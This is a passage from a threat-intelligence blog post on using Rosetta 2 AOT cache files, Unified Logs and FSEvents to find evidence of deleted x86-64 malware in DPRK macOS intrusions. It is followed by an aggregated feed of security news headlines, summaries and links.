binaries (containing both x86-64 and ARM64 code) are executed by a x86-64 process running through Rosetta 2 translation, the x86-64 version of these binaries is executed, resulting in the creation of AOT files. Figure 2: Overview of execution of universal binaries with X864-64 processes translated through Rosetta 2 versus ARM64 processes In a Democratic People's Republic of Korea (DPRK) crypto heist investigation, Mandiant observed a x86-64 variant of the POOLRAT macOS backdoor being deployed and the attacker proceeding to execute universal system binaries including ping, chmod, sudo, id, and cat through the backdoor. This resulted in AOT files being created and provided evidence of attacker interaction on the system through the malware (Figure 5). In some cases, the initial infection vector in macOS intrusions has involved legitimate x86-64 code that executes malware distributed as universal binaries. Because the initial x86-64 code runs under Rosetta 2, the x86-64 versions of malicious universal binaries are executed, leaving behind Rosetta 2 artifacts, including AOT files. In one case, a malicious Python 2 script led to the downloading and execution of a malicious universal binary. The Python 2 interpreter ran under Rosetta 2 since no ARM64 version was available, so the system executed the x86-64 version of the malicious universal binary, resulting in the creation of AOT files. Despite the attacker deleting the malicious binary later, we were able to analyze the AOT file to understand its functionality. Unified Logs The Rosetta 2 Daemon emits logs to the macOS Unified Log; however, the binary name values are marked as private. These values can be configured to be shown in the logs with a custom profile installed. Informational logs are recorded for AOT file lookups, when cached AOT files are available and utilized, and when translation occurs and completes. For binaries that are not configured to log to the Unified Log and are not launched interactively, in some cases this was found to be the only evidence of execution within the Unified Logs. Execution may be correlated with other supporting artifacts; however, this is not always possible. 0x21b1afc Info 0x0 1596 0 oahd: (1880): Aot lookup request for 0x21b1afc Info 0x0 1596 0 oahd: (1880): Translating image -> 0x21b1afc Info 0x0 1596 0 oahd: (1880): Translation finished for 0x21b1afc Info 0x0 1596 0 oahd: (1880): Aot lookup request for 0x21b1afc Info 0x0 1596 0 oahd: (1880): Using cached aot -> Figure 3: macOS Unified Logs showing Rosetta lookups, using cached files, and translating with private data disabled (default) 0x2ec304 Info 0x0 668 0 oahd: my_binary (Re(34180): Aot lookup request for /Users/Mandiant/my_binary 0x2ec304 Info 0x0 668 0 oahd: my_binary (Re(34180): Translating image /Users/Mandiant/my_binary -> /var/db/oah/237823680d6bdb1e9663d60cca5851b63e79f6c 8e884ebacc5f285253c3826b8/1c65adbef01f45a7a07379621 b5800fc337fc9db90d8eb08baf84e5c533191d9/my_binary.in_progress 0x2ec304 Info 0x0 668 0 oahd: my_binary (Re(34180): Translation finished for /Users/Mandiant/my_binary 0x2ec304 Info 0x0 668 0 oahd: my_binary(34180): Aot lookup request for /Users/Mandiant/my_binary 0x2ec304 Info 0x0 668 0 oahd: my_binary(34180): Using cached aot /Users/Mandiant/my_binary -> /var/db/oah/237823680d6bdb1e9663d60cca5851b63e 79f6c8e884ebacc5f285253c3826b8/1c65adbef01f45a7 a07379621b5800fc337fc9db90d8eb08baf84e5c533191d9/my_binary.aot Figure 4: macOS Unified Logs showing Rosetta lookups, using cached files, and translating with private data enabled (with custom profile installed) FSEvents FSEvents can be used to identify historical execution of x86-64 binaries even if Unified Logs or files in the Rosetta 2 Cache are not available or have been cleared. These records will show the creation of directories within the Rosetta 2 cache directory, the creation of .in_progress files, and then the renaming of the file to the AOT file, which will be named after the original binary. private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/5660060629e3493074db75fba3 5cff449a366ea59b26af7d54c59779cdfac161 FolderEvent; FolderCreated; 35102230 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/5660060629e3493074db75fba35 cff449a366ea59b26af7d54c59779cdfac161/ com.apple.systemsettings.cache.aot.in_progress FileEvent; Created;Renamed;Modified; 35102231 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/5660060629e3493074db75fba35 cff449a366ea59b26af7d54c59779cdfac161/com.apple.systemsettings.cache.aot FileEvent; Renamed; 35102231 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/31a32b61c112dae22363556599f 73f25fab17744eb0c51b8d0071c53bb878471 FolderEvent; FolderCreated; 35102223 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/31a32b61c112dae22363556599 f73f25fab17744eb0c51b8d0071c53bb878471/sudo.aot.in_progress FileEvent; Created;Renamed;Modified; 35102224 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/31a32b61c112dae22363556599 f73f25fab17744eb0c51b8d0071c53bb878471/sudo.aot FileEvent; Renamed; 35102224 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/9d8b46ee31e24e4988f923ac2e5 23171b7868f20b671cbaeb39d8db6199f4629 FolderEvent; FolderCreated; 35102259 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/9d8b46ee31e24e4988f923ac2e5 23171b7868f20b671cbaeb39d8db6199f4629/id.aot.in_progress FileEvent; Created;Renamed;Modified; 35102260 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/9d8b46ee31e24e4988f923ac2e5 23171b7868f20b671cbaeb39d8db6199f4629/id.aot FileEvent; Renamed; 35102260 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/fc9130581b8efed813de3826cfd 4bb34586b0872a0977efaa1d51f0861f564c9 FolderEvent; FolderCreated; 35102355 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/fc9130581b8efed813de3826cfd 4bb34586b0872a0977efaa1d51f0861f564c9/chmod.aot.in_progress FileEvent; Created;Renamed;Modified; 35102356 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/fc9130581b8efed813de3826cfd 4bb34586b0872a0977efaa1d51f0861f564c9/chmod.aot FileEvent; Renamed; 35102356 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/c38ceae510d3b2a96bfa6f040fdf 7587121eb388f508c5d50f53efc40cf35dde FolderEvent; FolderCreated; 35102671 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/c38ceae510d3b2a96bfa6f040fdf 7587121eb388f508c5d50f53efc40cf35dde/cat.aot.in_progress FileEvent; Created;Renamed;Modified; 35102672 private/var/db/oah/433955637247d22a05957b32fa7f08e0b2f022 ed40311775d461444ce17beadb/c38ceae510d3b2a96bfa6f040fdf 7587121eb388f508c5d50f53efc40cf35dde/cat.aot FileEvent; Renamed; 35102672 Figure 5: Decoded FSEvents records showing the translation of a x86-64 POOLRAT variant on macOS, and subsequent universal system binaries executed by the malware as x86-64 AOT File Analysis The AOT files within the Rosetta 2 cache can provide valuable insight into historical evidence of execution of x86-64 binaries. In multiple cases over the past year, Mandiant identified macOS systems being the initial entry vector by APT groups targeting cryptocurrency organizations. In the majority of these cases, Mandiant identified evidence of the attackers deleting the malware on these systems within a few minutes of a cryptocurrency heist being perpetrated. However, the AOT files were left in place, likely due to the protection by SIP and the relative obscurity of this forensic artifact. From a forensic perspective, the creation and modification timestamps on these AOT files provide evidence of the first time a specified binary was executed on the system with a unique combination of the attributes used to generate the SHA-256 hash. These timestamps can be corroborated with other artifacts related to binary execution where available (for example, Unified Logs or ExecPolicy, XProtect, and TCC Databases), and file system activity through FSEvents records, to build a more complete picture of infection and possible attacker activity if child processes were executed. Where multiple AOT files exist for the same origin binary under different Binary UUID directories in the Rosetta 2 cache, and the content (file hashes) of those AOT files is the same, this is typically indicative of a change in file data sections, or more commonly, file system metadata only. Mandiant has previously shown that AOT files can be analyzed and used for malware identification through correlation of symbols. AOT files are Mach-O binaries that contain x86-64 instructions that have been translated from the original ARM64 code. They contain jump-backs into the original binary and contain no API calls to reference. Certain functionality can be determined through reverse engineering of AOT files; however, no static data, including network-based indicators or configuration data, are typically recoverable. In one macOS downloader observed in a notable DPRK cryptocurrency heist, Mandiant observed developer file path strings as part of the basic Mach-O information contained within the AOT file. The original binary was not recovered due to the attacker deleting it after the heist, so this provided useful data points to support threat actor attribution and malware family assessment. /Users/crown/Library/Developer/Xcode/DerivedData/ DownAndMemload-becawjfobisdcocirecqedzcixcf/Build/Intermediates.noindex/ DownAndMemload.build/Release/DownAndMemload.build/ Objects-normal/x86_64/main.o /Users/crown/Library/Developer/Xcode/DerivedData/ DownAndMemload-becawjfobisdcocirecqedzcixcf/Build/Intermediates.noindex/ DownAndMemload.build/Release/DownAndMemload.build/Objects-normal/ x86_64/queue.o /Volumes/Data/Development/DownAndMemload/DownAndMemload/ _g_szServerUrl _szgetpwuid _szsleep Figure 6: Interesting strings from an AOT file related to a malicious DPRK downloader that was unrecoverable In any case, determining malware functionality is more effective using the original complete binary instead of the AOT file, because the AOT file lacks much of the contextual information present in the original binary. This includes static data and complete Mach-O headers. Poisoning AOT Files Much has been written within the industry about the potential for the poisoning of the Rosetta 2 cache through modification or introduction of AOT files. Where SIP is disabled, this is a valid attack vector. Mandiant has not yet seen this technique in the wild; however, during hunting or investigation activities, it is advisable to be on the lookout for evidence of AOT poisoning. The best way to do this is by comparing the contents of the ARM64 AOT files with what would be expected based on the original x86-64 executable. This can be achieved by taking the original x86-64 executable and using it to generate a known-good AOT file, then comparing this to the AOT file in the cache. Discrepancies, particularly the presence of injected shellcode, could indicate AOT poisoning. Conclusion There are several forensic artifacts on macOS that may record historical evidence of binary execution. However, in cases of advanced intrusions with forensically aware attackers, original binaries being deleted, and no further security monitoring solutions, combining FSEvents, Unified Logs, and, crucially, residual AOT files on disk has provided the residual evidence of intrusion on a macOS system. Whilst signed macOS ARM64 binaries may be the future, for now AOT files and the artifacts surrounding them should be reviewed in analysis of any suspected macOS intrusion and leveraged for hunting opportunities wherever possible. The behavior identified in the cases presented here was identified on various versions of macOS between 13.5 and 14.7.2. Future or previous versions of macOS and Rosetta 2 may behave differently. Acknowledgements Special thanks to Matt Holley, Mohamed El-Banna, Robert Wallace, and Adrian Hernandez.

https://cloud.google.com/blog/topics/threat-intelligence/rosetta2-artifacts-macos-intrusions/
Martin Rees: Post-human intelligence – a cosmic perspective | Starmus highlights
2025-03-03T10:00:00Z | 1740996000

Take a moment to think beyond our current capabilities and consider what might come next in the grand story of evolution

https://www.welivesecurity.com/en/we-live-science/martin-rees-post-human-intelligence-cosmic-perspective-starmus-highlights/
First Search Central Live in South Africa
2025-03-03T10:00:00Z | 1740996000

On April 2, 2025 we'll be in Johannesburg, South Africa for the very first Search Central Live event in Africa! We're excited to welcome you at Search Central Live South Africa and talk about all things Google Search!

https://developers.google.com/search/blog/2025/03/first-search-central-live-south-africa
Palo Alto Networks Prisma SASE 5G: Enabling Service Providers to Offer Best-in-Class Protection for the 5G Era
2025-03-03T05:00:00Z | 1740978000

Expanded 5G partner ecosystem builds momentum, helping customers secure their networks and protect critical data BARCELONA, Spain , March 3, 2025 /PRNewswire/ -- Palo Alto Networks® (NASDAQ: PANW), the global cybersecurity leader, introduced today Prisma SASE 5G , delivering the functionality and

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-prisma-sase-5g-enabling-service-providers
Continuous TRAIL
2025-03-03T05:00:00Z | 1740978000

You and your team should incrementally update your threat model as your system changes, integrating threat modeling into each phase of your SDLC to create a Threat and Risk Analysis Informed Lifecycle (TRAIL). Here, we cover how to do that: how to further tailor the threat model we built, how to maintain it, when to update it as development continues, and how to make use of it.

https://blog.trailofbits.com/2025/03/03/continuous-trail/
Transforming mobile networks: delivering on programmable platform promise
2025-03-03T04:00:00Z | 1740974400

The mobile industry's at a pivotal moment, with immense growth potential. To seize this, service providers must innovate in radical ways.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/transforming-mobile-networks-delivering-on-programmable-platform-promise.html
How Virgin Media O2 differentiates with customer experience
2025-03-03T04:00:00Z | 1740974400

See how Virgin Media O2 uses Cisco ThousandEyes to deliver enhanced customer services powered by real-time insight into home connections and the last mile.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/how-virgin-media-o2-differentiates-with-customer-experience.html
Security Alert (A25-03-01): Vulnerability in Synology DiskStation Manager
2025-03-03T04:00:00Z | 1740974400

Synology has published a security advisory to address a vulnerability in various versions of DiskStation Manager (DSM).

https://www.govcert.gov.hk/en/alerts_detail.php
The FIRST Board of Directors Launches FIRST’s Strategy Framework
2025-03-03T00:30:00Z | 1740961800

The FIRST Board of Directors is introducing a new structured approach to strategic planning, aimed at enhancing the organization’s ability to fulfill its mission and solidify its position as a global leader in cybersecurity and incident response.

https://www.first.org/blog/20250303-Strategy-Framework
The FIRST Board of Directors Launches FIRST’s Strategy Framework
2025-03-03T00:30:00Z | 1740961800

The FIRST Board of Directors is introducing a new structured approach to strategic planning, aimed at enhancing the organization’s ability to fulfill its mission and solidify its position as a global leader in cybersecurity and incident response.

https://www.first.org/blog/20250303-Strategy-Framework
SOC teams Address Modern Network Attacks Globally with Vectra AI by Nicole Drake
2025-03-03T00:00:00Z | 1740960000

Secure on-premises and private cloud infrastructure with Vectra AI’s analysis for faster responses, reduced workload, and minimized alert noise.

https://www.vectra.ai/blog/soc-teams-address-modern-network-attacks-globally-with-vectra-ai
Keeping connected, at a remote pediatric camp
2025-02-28T13:00:00Z | 1740747600

Canada’s Brigadoon Village — a summer camp for children living with health and life challenges — gains critical networking support from Cisco volunteers and partners. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/keeping-connected-at-a-remote-pediatric-camp.html
Keeping connected, at a remote pediatric camp
2025-02-28T13:00:00Z | 1740747600

Canada’s Brigadoon Village — a summer camp for children living with health and life challenges — gains critical networking support from Cisco volunteers and partners. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/keeping-connected-at-a-remote-pediatric-camp.html
Lightning-Fast Requests with Early Data
2025-02-28T13:00:00Z | 1740747600

https://www.akamai.com/blog/edge/2025/feb/lightning-fast-requests-with-early-data
Vulnerabilities in CyberArk Endpoint Privilege Manager software
2025-02-28T12:00:00Z | 1740744000

CERT Polska has received a report about 5 vulnerabilities (from CVE-2025-22270 to CVE-2025-22274) found in CyberArk Endpoint Privilege Manager software.

https://cert.pl/en/posts/2025/02/CVE-2025-22270/
Vulnerability in DaVinci Resolve application
2025-02-28T11:00:00Z | 1740740400

Incorrect Privilege Assignment vulnerability (CVE-2025-1413) has been found in DaVinci Resolve application.

https://cert.pl/en/posts/2025/02/CVE-2025-1413/
Riasztás Nemzeti Adó- és Vámhivatalt megszemélyesítő, káros csatolmányú e-mail kapcsán
2025-02-28T10:39:04Z | 1740739144

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Nemzeti Adó- és Vámhivatal nevében küldött, káros csatolmányt tartalmazó levéllel kapcsolatban. Intézetünkhöz több bejelentés is érkezett, amely szerint a Nemzeti Adó- és Vámhivatal nevében, ismeretlen támadók olyan levelet küldtek ki számos intézmény részére, amelyben hivatalos dokumentummal kapcsolatos tájékoztatásra hivatkozva a csatolmány […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-nemzeti-ado-es-vamhivatalt-megszemelyesito-karos-csatolmanyu-e-mail-kapcsan/
Threat Report H2 2024: Infostealer shakeup, new attack vector for mobile, and Nomani
2025-02-28T10:00:00Z | 1740736800

Big shifts in the infostealer scene, novel attack vector against iOS and Android, and a massive surge in investment scams on social media

https://www.welivesecurity.com/en/podcasts/threat-report-h2-2024-infostealer-shakeup-new-attack-vector-mobile-nomani/
Hillstone iSource Extended Detection and Response (XDR) Solution
2025-02-28T07:21:12Z | 1740727272

Hillstone iSource is a data-driven, AI-powered extended detection and response (XDR) platform that integrates massive security data, investigates correlations of incidents, identifies potential threats, automates security orchestration and responds cohesively across multiple security products and platforms. It brings a radical new approach to cybersecurity with complete visibility, highly accurate threats identification and swift containment and […] The post Hillstone iSource Extended Detection and Response (XDR) Solution appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-isource-extended-detection-and-response-xdr-solution/
Threat modeling the TRAIL of Bits way
2025-02-28T05:00:00Z | 1740718800

In this blog, we’ll talk about our threat modeling process, TRAIL, which stands for Threat and Risk Analysis Informed Lifecycle. TRAIL enables us to trace and document the impact of flawed trust assumptions and insecure design decisions throughout each client’s system architecture and SDLC. Over time, multiple application security experts have refined TRAIL to provide maximal value for our clients and to minimize the effort required to update the threat model as the system changes.

https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way/
New DDoS Botnet Discovered: Over 30,000 Hacked Devices, Majority of Observed Activity Traced to Iran
2025-02-28T00:00:00Z | 1740700800

A newly discovered global cyber threat is rapidly expanding, infecting tens of thousands of internet-connected devices to launch powerful cyberattacks. Nokia Deepfield’s Emergency Response Team (ERT) has identified a new botnet, tracked as Eleven11bot, which they estimated has compromised over 30,000 devices, primarily security cameras and network video recorders (NVRs).

https://www.greynoise.io/blog/new-ddos-botnet-discovered
Strengthening Our Emissions Accounting Process
2025-02-27T18:00:00Z | 1740679200

https://www.akamai.com/blog/sustainability/2025/feb/strengthening-our-emissions-accounting-process-blog
Turning 56 Billion Attacks into a Proactive Defense Strategy: A CISO’s Guide to HYAS Insight
2025-02-27T16:25:00Z | 1740673500

In today’s rapidly evolving threat landscape, the sheer volume of malicious activity can be overwhelming. One client recently shared with me a startling statistic: on average, they observed 56 billion unique attacks every quarter.  Yes, that number was 56 billion. For any security leader or CISO, these numbers may seem insurmountable—a deluge of data, noise, and potential vulnerabilities that would certainly keep teams awake at night if not drive burnout, with the high likelihood that the most important one accidentally gets missed. However, this same client also demonstrated that with the right intelligence, it’s possible to cut through the chaos and focus on what truly matters.  As the CTO of a telecommunications company said to me, “HYAS doesn’t just find the needle in the haystack, you find the needle in the stack of needles.” The Challenge: An Avalanche of Threats Imagine having to defend against 56 billion unique attacks every three months. This isn’t a theoretical risk; it’s a reality for many organizations operating in an era where cyber threats are not only increasing in volume but also evolving in sophistication. Artificial intelligence is not only making them better and more complicated, but easier to launch; nation-states are providing the money and resources for research and highly complex delivery and insertion mechanisms.  For CISOs and others in the Office of the CISO, the challenge is not just about the quantity of alerts but about discerning which threats are actionable and which are mere background noise. With limited resources and growing expectations, finding a way to reduce the burden while ensuring robust protection is paramount. The HYAS Advantage: Intelligence that Makes a Difference HYAS Insight is built on the principle that quality, context-rich intelligence can transform security operations. As one long-term client said to me, “I have a ton of tools. But none of them do what HYAS does. You are the glue that connects all other intel tools”How?  By leveraging extensive infrastructure intelligence, HYAS Insight empowers security teams to sift through billions of alerts and identify the most relevant threats. In the case of one client, using HYAS Insight led to an impressive 70% reduction in the volume of attacks requiring immediate attention.This isn’t about eliminating threats altogether—it’s about filtering out the noise. By reducing the initial pool by 70%, the client was then able to integrate other cyber security tools to further analyze and prioritize the remaining signals. The result? A streamlined workflow that focused on actionable intelligence, enabling the team to understand attacker behaviors and pinpoint vulnerabilities effectively. From Overwhelm to Actionable Insight For CISOs and security leaders, the implications are clear: Focus on What Matters: With a 70% reduction in noise, teams can concentrate on high-priority alerts, ensuring that response efforts are both timely and effective. Enhanced Situational Awareness: Understanding the “why” and “how” behind each remaining alert offers critical context—information that is essential for proactive defense and strategic planning. Optimized Resource Allocation: By filtering out redundant or irrelevant data, organizations can better allocate their limited security resources, driving efficiency without compromising on protection. Infrastructure Intelligence Needs to be the First Step: Every attack, and every criminal, utilizes Internet infrastructure and other Internet resources (emails, phone numbers, DNS data, etc) to command and control their attacks; utilizing this knowledge as the first step provides the best path for rapid, efficient triage. HYAS Insight doesn’t just reduce the number of alerts—it transforms raw data into actionable intelligence. One CISO said to me “HYAS transforms meta information into actionable intelligence” – the meta information being infrastructure intelligence and related Internet indicators.  This enables organizations to shift from a reactive to a proactive posture, anticipating threats before they escalate into significant breaches.     Building a Proactive Security Strategy The journey doesn’t end at filtering and prioritization. With the refined intelligence provided by HYAS Insight, the client was able to: Identify Attack Patterns: Understand emerging tactics, techniques, and procedures (TTPs) of adversaries. Prioritize Investments: Allocate budgets and resources to defend against the most relevant threats. Enhance Collaboration: Share key insights with internal teams and external partners, creating a unified and informed security ecosystem. In an era where cyber adversaries are continuously evolving, the ability to preempt attacks through precise, intelligence-driven insights is not just an advantage—it’s a necessity. Conclusion: Embrace the Power of Infrastructure Intelligence The experience of this HYAS client is a compelling case study for all CISOs and security leaders. Confronted with an overwhelming number of unique attacks, they turned to HYAS Insight to cut through the noise, reduce the burden by 70%, and focus on what truly mattered. This approach not only improved their operational efficiency but also enhanced their ability to predict and prevent potential threats.For organizations looking to fortify their defenses in an increasingly complex digital landscape, investing in comprehensive infrastructure intelligence like HYAS Insight is a strategic move. It’s about turning data overload into actionable intelligence—a vital step in building a proactive, resilient security posture in today’s cyber environment.   Embracing tools that provide deep, contextual intelligence can be the game changer in your security strategy. As threats continue to grow in number and complexity, make sure your defenses are informed by the best intelligence available—because in the realm of cybersecurity, knowing what to ignore is just as crucial as knowing what to fight.

https://www.hyas.com/blog/turning-56-billion-attacks-into-a-proactive-defense-strategy
Threat Research Report: Web Browsers as an Overlooked Risk in Cybersecurity
2025-02-27T16:12:52Z | 1740672772

Web browsers have evolved from passive document viewers into complex platforms essential for cloud-based work. But this transformation has also made them a prime target for cyber threats, leaving enterprises and government networks vulnerable.

https://mixmode.ai/blog/threat-research-report-web-browsers-as-an-overlooked-risk-in-cybersecurity/
Five Layers of Assurance for Lawful Intelligence Deployments
2025-02-27T13:52:13Z | 1740664333

Intelligence implementations can involve thousands of network functions. Discover the benchmark for reliable mission-critical deployments, including a multi-layered approach for security and high availability. The post Five Layers of Assurance for Lawful Intelligence Deployments appeared first on SS8.

https://www.ss8.com/five-layers-of-assurance-for-lawful-intelligence-deployments/
Cato XDR: Finally, A Tool Built by People Who Actually Read the Logs!
2025-02-27T13:28:00Z | 1740662880

Ever feel like some tools are designed by people who’ve never had to use them? Like those public restroom hand dryers that leave your hands wetter than before, or CAPTCHAs that make you question if you even know what a bicycle looks like—it’s like a bad joke at our expense.  In the 2022 Devo SOC... The post Cato XDR: Finally, A Tool Built by People Who Actually Read the Logs!  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-xdr-tool-built-by-people-who-actually-read-the-logs/
Cyber Weather, January 2025
2025-02-27T13:27:00Z | 1740662820

The first Cyber Weather report in 2025 includes an overview of long-term phenomena, a special focus area in the NCSC-FI’s monitoring activities this year. The January weather report also covers the top five threats in the near future.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-january-2025
Cyber Weather, January 2025
2025-02-27T13:27:00Z | 1740662820

The first Cyber Weather report in 2025 includes an overview of long-term phenomena, a special focus area in the NCSC-FI’s monitoring activities this year. The January weather report also covers the top five threats in the near future.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-weather-january-2025
Focus on the CNIL’s Recommendations for Mobile Applications
2025-02-27T10:29:57Z | 1740652197

Why Are Mobile Applications a Major Security Concern? Mobile applications have become essential tools in our daily lives, both for personal and professional use. They contain a wealth of sensitive data and interact with various systems, making them prime targets for cyberattacks.

https://blog.pradeo.com/focus-on-the-cnils-recommendations-for-mobile-applications
Bernhard Schölkopf: Is AI intelligent? | Starmus highlights
2025-02-27T10:00:00Z | 1740650400

With AI's pattern recognition capabilities well-established, Mr. Schölkopf's talk shifts the focus to a pressing question: what will be the next great leap for AI?

https://www.welivesecurity.com/en/we-live-science/bernhard-scholkopf-is-ai-intelligent-starmus-highlights/
Clavister Wins Cybersecurity Contract with Global Technology Provider
2025-02-27T09:34:57Z | 1740648897

27 February 2025 – Örnsköldsvik, Sweden – Clavister, a leading European cybersecurity provider for mission-critical applications, announced today that it has secured a contract to supply cybersecurity products to a… Read more The post Clavister Wins Cybersecurity Contract with Global Technology Provider appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-wins-cybersecurity-contract-with-global-technology-provider/
CERT.LV activity review Q4 2024
2025-02-27T09:04:43Z | 1740647083

In Q4 2024, the number of unique IP addresses compromised in Latvia reached an all-time high, indicating a significant increase in the number and intensity of cyber threats. The number of reports logged by CERT.LV has increased by 3% compared to Q3 and by 25% compared to Q4 2023.

https://cert.lv/en/2025/02/cert-lv-activity-review-q4-2024
One in Five UK Adults Are Financially Vulnerable but Many Can’t Access Credit
2025-02-27T07:00:00Z | 1740639600

With the UK experiencing the unexpected hike in inflation in January 2025 to 3%,i TransUnion, a global information and insights company, is releasing previously unseen research that reveals one in five (20%) UK adults – the equivalent of 11 million people – would consider themselves financially vulnerable.  According to the FCA, financially vulnerable consumers are susceptible to harm, due to their personal circumstances, including poor health, life changes like new caring responsibilities, or difficulty handling financial or emotional stress.ii In fact, the data from TransUnion shows the impact of money worries on mental wellbeing, with nearly seven in 10 (68%) financially vulnerable people feeling stressed when dealing with their finances.James Robinson, managing director of consumer interactive at TransUnion in the UK, said: “With the economic climate looking like it could remain uncertain throughout 2025, many people in the UK are turning to borrowing to help manage their money and make ends meet. With a fifth of UK adults considering themselves to be financially vulnerable, responsible lending is critical. Access to credit products tailored to their needs can empower financially vulnerable consumers to avoid unmanageable debt and build financial resilience.”The cost of living remains high, with inflation still above the Bank of England’s 2% target. In this climate, more than a quarter (26%) of UK adults are relying on credit cards to meet shortfalls in their monthly finances, while 16% dip into their overdrafts.Meanwhile, 15% of UK adults borrow money from friends and family in order to be able to afford their monthly expenses, whilst over one in 10 (12%) turn to Buy Now, Pay Later (BNPL) services. Overall, one in 10 (10%) adults report that they wouldn’t be able to maintain their current lifestyle without credit or financing options.Indeed, this reality was reflected in TransUnion’s Q4 2024 Consumer Pulse data, where since the previous quarter, consumer optimism has dropped a whopping 9% among middle income families (those earning between £30,000 - £79,999), falling from 57% who were optimistic about their household finances over the next 12 months to 48%. Low income families (those earning under £30,000 annually) remain the least optimistic, with only 37% stating they are optimistic about their household finances over the next 12 months, highlighting the continued strain on more financially vulnerable households.However, many more struggle to consistently access credit, with 9% indicating having been turned down within the last 12 months. 35-44-year-olds (18%) were the most likely age demographic to have a credit application rejected.The most common reason people said they were turned down for when looking to borrow money, is a low credit score (33%) – a demonstration of the importance of understanding and regularly monitoring your credit report.One probable factor affecting credit scores is that almost one in five adults (19%) admitted to finding it hard to keep track of their monthly payment commitments across all of the financial products they use. Meanwhile, a quarter (25%) of UK adults reported that their provider didn’t believe they could afford to repay their debt, or that they had borrowed too much already.James Robinson continues: “It is crucial that financially vulnerable customers are offered care and support to make informed credit decisions and improve their financial wellbeing. As part of our mission to use information for good, we leverage vulnerability and affordability insights, enabling lenders to provide access to lower-cost credit and preventing borrowers from falling into problem debt.”TransUnion’s commitment to ‘Information for Good’ drives financial inclusion through responsible lending to ensure each consumer is reliably and safely represented in the marketplace. As part of this commitment, TransUnion announced that they were the first CRA to partner with the Vulnerability Registration Service, giving their clients access to an independent register of vulnerable individuals, helping them to identify vulnerabilities and make informed decisions in alignment with regulatory guidance.To learn more about TransUnion’s affordability offerings, visit our Affordability Report here.Notes:i Consumer price inflation, UK - Office for National Statisticsii Financial Conduct Authority (FCA)

https://newsroom.transunion.co.uk/one-in-five-uk-adults-are-financially-vulnerable-but-many-cant-access-credit/
Security Alert (A25-02-19): Multiple Vulnerabilities in Cisco Products
2025-02-27T04:00:00Z | 1740628800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Linux Detection Engineering - The Grand Finale on Linux Persistence
2025-02-27T00:00:00Z | 1740614400

By the end of this series, you'll have a robust knowledge of both common and rare Linux persistence techniques; and you'll understand how to effectively engineer detections for common and advanced adversary capabilities.

https://www.elastic.co/security-labs/the-grand-finale-on-linux-persistence
AI in Cybersecurity: Will Big Adoption Trends Deliver Big Outcomes? by Jesse Kimbrel
2025-02-27T00:00:00Z | 1740614400

How is AI transforming cybersecurity? See how security teams are leveraging AI to accelerate response times, reduce workload, and cut alert noise.

https://www.vectra.ai/blog/ai-in-cybersecurity-will-big-adoption-trends-deliver-big-outcomes
GreyNoise 2025 Mass Internet Exploitation Report: Attackers Are Moving Faster Than Ever — Are You Ready?
2025-02-27T00:00:00Z | 1740614400

Attackers are automating exploitation at scale, targeting both new and old vulnerabilities — some before appearing in KEV. Our latest report breaks down which CVEs were exploited most in 2024, how ransomware groups are leveraging mass exploitation, and why real-time intelligence is critical.

https://www.greynoise.io/blog/2025-mass-internet-exploitation-report
Network DLP for Microsoft Purview Labeled Documents
2025-02-26T21:38:09Z | 1740605889

Download Feature Benefit Sheet The post Network DLP for Microsoft Purview Labeled Documents appeared first on iboss.

https://www.iboss.com/feature-benefit-sheets/network-dlp-for-microsoft-purview-labeled-documents-feature-benefit-sheet/
Security Insights & Incident Management
2025-02-26T21:37:26Z | 1740605846

Download Feature Benefit Sheet The post Security Insights & Incident Management appeared first on iboss.

https://www.iboss.com/feature-benefit-sheets/security-insights-incident-management-feature-benefit-sheet/
Security considerations when using open source software (ITSAP.10.059)
2025-02-26T19:35:26Z | 1740598526

https://cyber.gc.ca/en/guidance/security-considerations-when-using-open-source-software-itsap10059
Hiding in Plain Sight: The Hidden Dangers of Geolocation in Cloud Security
2025-02-26T19:09:16Z | 1740596956

